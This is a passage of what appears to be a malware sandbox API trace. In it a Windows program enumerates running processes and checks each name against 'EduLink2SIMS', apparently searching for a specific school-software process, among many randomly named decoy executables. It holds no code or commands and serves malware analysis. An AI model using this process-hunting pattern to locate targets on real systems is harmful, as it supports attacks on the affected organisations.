lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.906] StrStrIA (lpFirst="taskhostw.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.906] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.907] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e7f0 [0100.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356e7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0100.907] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0100.907] StrStrIA (lpFirst="explorer.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.907] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.908] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d7e8 [0100.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357d7e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0100.909] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0100.909] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.909] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0100.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.910] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356c298 [0100.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356c298, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0100.910] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0100.910] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.910] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0100.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.911] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d688 [0100.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357d688, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0100.911] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0100.911] StrStrIA (lpFirst="Memory Compression", lpSrch="EduLink2SIMS") returned 0x0 [0100.911] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0100.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.912] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357d568 [0100.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357d568, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0100.912] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0100.912] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.912] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0100.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.913] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e910 [0100.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356e910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0100.913] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0100.913] StrStrIA (lpFirst="SearchUI.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.913] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0100.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.914] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d7c8 [0100.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357d7c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0100.914] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0100.914] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.914] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.915] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e730 [0100.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356e730, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.915] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.915] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.915] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0100.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.916] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e988 [0100.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356e988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0100.916] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0100.928] StrStrIA (lpFirst="pending.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.928] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0100.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.930] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c270 [0100.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356c270, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0100.930] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0100.930] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.930] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0100.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.931] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d5a8 [0100.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357d5a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0100.931] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0100.931] StrStrIA (lpFirst="swing prefer.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.931] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0100.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.935] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356c338 [0100.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356c338, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0100.935] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0100.935] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.935] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0100.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.936] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d748 [0100.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357d748, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0100.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0100.936] StrStrIA (lpFirst="nights-attending.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.936] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0100.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.937] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e808 [0100.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356e808, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0100.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0100.937] StrStrIA (lpFirst="installed.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.937] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0100.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.938] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c360 [0100.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356c360, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0100.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0100.938] StrStrIA (lpFirst="references compounds.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.938] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0100.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.939] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d808 [0100.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357d808, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0100.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0100.939] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.939] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0100.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.940] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d868 [0100.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357d868, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0100.940] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0100.940] StrStrIA (lpFirst="registered try.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.940] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0100.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.941] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e758 [0100.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357e758, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0100.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0100.941] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.941] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0100.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.942] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e6d0 [0100.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356e6d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0100.942] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0100.942] StrStrIA (lpFirst="invite.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.942] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0100.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.943] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e898 [0100.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356e898, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0100.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0100.943] StrStrIA (lpFirst="idol.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.943] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0100.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.944] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e708 [0100.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357e708, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0100.944] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0100.944] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.944] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0100.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.945] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e578 [0100.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357e578, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0100.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0100.945] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.945] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, 